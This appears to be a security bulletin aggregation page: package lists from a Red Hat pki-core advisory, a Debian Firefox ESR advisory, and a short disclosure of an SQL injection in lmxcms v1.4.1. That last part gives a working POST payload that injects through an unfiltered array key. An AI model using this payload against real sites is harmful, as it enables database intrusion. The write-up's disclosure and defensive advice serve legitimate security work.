tomcatjss-7.4.1-2.module+el8.2.0+6294+b7db4606.noarch.rpm

ppc64le:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm

s390x:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm

x86_64:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.src.rpm  
ldapjdk-4.21.0-2.module+el8.2.0+6294+b7db4606.src.rpm  
pki-core-10.8.4-1.module+el8.2.0+17305+ef598dea.src.rpm  
tomcatjss-7.4.1-2.module+el8.2.0+6294+b7db4606.src.rpm

aarch64:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm

noarch:  
ldapjdk-4.21.0-2.module+el8.2.0+6294+b7db4606.noarch.rpm  
ldapjdk-javadoc-4.21.0-2.module+el8.2.0+6294+b7db4606.noarch.rpm  
pki-base-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-base-java-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-ca-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-kra-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-server-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
python3-pki-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
tomcatjss-7.4.1-2.module+el8.2.0+6294+b7db4606.noarch.rpm

ppc64le:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm

s390x:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm

x86_64:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.src.rpm  
ldapjdk-4.21.0-2.module+el8.2.0+6294+b7db4606.src.rpm  
pki-core-10.8.4-1.module+el8.2.0+17305+ef598dea.src.rpm  
tomcatjss-7.4.1-2.module+el8.2.0+6294+b7db4606.src.rpm

aarch64:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm

noarch:  
ldapjdk-4.21.0-2.module+el8.2.0+6294+b7db4606.noarch.rpm  
ldapjdk-javadoc-4.21.0-2.module+el8.2.0+6294+b7db4606.noarch.rpm  
pki-base-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-base-java-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-ca-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-kra-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-server-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
python3-pki-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
tomcatjss-7.4.1-2.module+el8.2.0+6294+b7db4606.noarch.rpm

ppc64le:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm

s390x:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm

x86_64:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2414  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDcxWNzjgjWX9erEAQi/AA/9GNdQctKqRnMI2c+jyjs/LF5USS5Qx3dk  
axfQaGBzI7jYtBReNbGlVnlQzS+/DjiChUfl2m2YU1pAhhO3B7/Nd5t6xC9mMkUN  
Itvzu46P1pPCt0pURc+BEpC6PxIHq6cFpEeS9L52FFWjUTYKH/IeIb3Po0XGtyZ1  
lHIOjqvAZTXSi+7IR07pXBKNy03vUNVdVcRDqNkls9FFfKDsx11/KgoIksWxkBtC  
oiuhLaMzlsmmL2VC60ZbrGKBstOIalL+X1p1JmG3W5aRFiIu90MeyHpX1cQwldlD  
mWzKZUG/e8KI7iFufQZ6nsHGrCvREWDncpbUcRxilRI1jBPqI5cJfol2CKmrAMT7  
UWhn4WMfBGmKr7heUxemxJowFtlRSbzz0I95qW5J3JA74JjsMDxkLwWnTlLf70yo  
F71oy0IJWSdQ776bkR9oy7ZlcLioNhFEtGR9/kDc2AKdP1bc+hNZV2s/2UYC0aSj  
4Nx3gJp8g1PcnwDMJwL3KvxA4DWZ4YhJ2lInSqGQ37WyIr/7OPknjWaVdzb1unvl  
fRjWygiwJ90zEOv2gkyVAa01GrScO/xi6ppR1am6lXVGdUcmZYYs3jeL0ajEEkvo  
g/3hqWgqcai9a8DkaubbwhwPDpia+s38CjRQML3AD+k+02IZcOr1pcNFygy/BLyR  
TppOjgbEuAk=PPtl  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1747-01

Debian Linux Security Advisory 5385-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code or spoofing.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5385-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
April 12, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2023-1945 CVE-2023-29533 CVE-2023-29535 CVE-2023-29536  
                 CVE-2023-29539 CVE-2023-29541 CVE-2023-29548 CVE-2023-29550  
Debian Bug     : 982794

Multiple security issues have been found in the Mozilla Firefox  
web browser, which could potentially result in the execution  
of arbitrary code or spoofing.

For the stable distribution (bullseye), these problems have been fixed in  
version 102.10.0esr-1~deb11u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQ28JsACgkQEMKTtsN8  
TjbdRg/8DSoN4DTk+CAuIooGwX0fON/G7DgsrGR+dFwQEBd/PMf7Hy+A9EpjOO7E  
IeXK4XHNOV8qbAx3wQ3E9R6oZT//rvgXjYbiNY717OUkK1D7C5QJEinJsY57J2WX  
TW4Q27RuPVVft9sCsKkq47yQE+XT11Z7FuQ+L8xOSZ8+adfvhKhrlZGtzSd9Olux  
1XNmYgJGXu0IEzm5lqWzu+zvraY/yZbOFMStdu3t/tF+jIA2O6v25E2xczObOepv  
TbynApqS1YAH7qlbvjE31qZ3J0mTWhPLtdo6OBKucpc1KBRuSJYcC5sUoGZ5dFrl  
5+K3YfOlPjTww94mx1Own1WDyNw+g37lEGt5enQ/EkWSVKK4co/pzCvzmc7xxzr9  
64ukerv/C94KjSdmPPr6kr4qjUJThs/XlFTbhbPvRRL0Blk/fIJuG1dALXk2R2Ut  
4La0T9h0tGoEoLDGoI1A/cKl2cLnpGg0LeLxWhMysVcYSFcza/0EfYmGtDbRp5iv  
bB+vlpYjjWaNyx+ZtxDtbPtZ9ZmTOKPjrQ+bJFAEYqykIAlueC3bBwqpMz5SxPqg  
NDxWoGK13S//9Ug3c/GPcxNNiV1jNPxuG9Dy3Kq1/LHKrDtnYOfjXrg7nqelRSHS  
1NVzxuTD/0lV8tlo/806hoZToxINqi+c13/Nm5GnDiMzdg3u/hQ=RuqS  
-----END PGP SIGNATURE-----

Debian Security Advisory 5385-1

lmxcms v1.4.1 was discovered to contain a SQL injection vulnerability via the setbook parameter at index.php.

This is the message page of the front desk  

Find the back-end code through the front page. The ischeck is to judge whether the content of the message is displayed on the page. There are several key functions in the picture.  
Function call flow:  
index() calls checkDate()  
checkDate() calls the filter\_strs($\_POST) function to filter strings  
checkDate() calls the p() function again to prevent injection  
The p() function calls the filter\_sql() function to filter the reserved characters of mysql to prevent injection  
Then index() continues execution and calls the add() function  
The add() function calls the addModel() function in turn  
addModel() function and then addDB() function  
$sql in the addDB() function is an insert statement, where the value of $value comes from $data, and the value of $date is a parameter we can control.  
  
  
  
  
  
  

Add echo $sql to output complete sql statement, which is convenient for constructing payload.  

Packet analysis  

After inserting the page, the message will not be displayed, only when ischeck=1 will it be displayed in the foreground  
  

There are a lot of filtering functions in the previous code, but I found that these filtering functions only filter the 'value' in the array $data, but not the 'key', and the front page will echo only when ischeck=1 , so construct the payload and close the INSERT statement.  
payload: name=x&mail=x&tel=x&content=x&setbook=%E6%8F%90%E4%BA%A4&ischeck=1&time)VALUES(user(),1,1,1,1,1,1);#=1  
  

Protection Advice  
Filter the keys in the array as well

Tag

#js